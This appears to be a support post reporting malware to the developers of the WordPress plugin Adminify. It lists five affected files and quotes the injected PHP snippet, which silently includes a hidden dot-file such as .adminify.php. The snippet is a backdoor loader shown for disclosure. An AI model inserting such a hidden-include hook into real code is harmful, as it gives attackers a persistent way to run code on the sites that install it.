Hi there,
From what we can see the following files of the plugin:
———-
adminify/trunk_2021-10-01/inc/functions.php |
adminify/trunk_2021-10-01/inc/Modules/LoginCustomizer/inc/wp-adminify-login-template.php |
adminify/trunk_2021-10-01/inc/Modules/LoginCustomizer/inc/templates/login-both-half.php |
adminify/trunk_2021-10-01/inc/Modules/NotificationBar/inc/add-sections.php |
adminify/trunk_2021-10-01/inc/classes/compatibility/webrax.php
———-
Got the following changes:
if (file_exists(plugin_dir_path(__FILE__) . ‘/.’ . basename(plugin_dir_path(__FILE__)) . ‘.php’)) {
include_once(plugin_dir_path(__FILE__) . ‘/.’ . basename(plugin_dir_path(__FILE__)) . ‘.php’);
}
It tries to include files starting with dot in the main plugin directory:
.adminify.php
if it exists.
Usually, such injections are part of multicomponent malware.
Probably this code got copied from a compromised website.
Can you please clear out those files from this code, please?
Thank you!
